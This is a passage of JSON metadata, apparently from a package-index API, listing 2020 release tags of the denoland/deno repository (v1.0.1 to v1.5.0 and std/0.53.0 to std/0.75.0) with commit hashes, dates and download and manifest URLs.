ttps://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G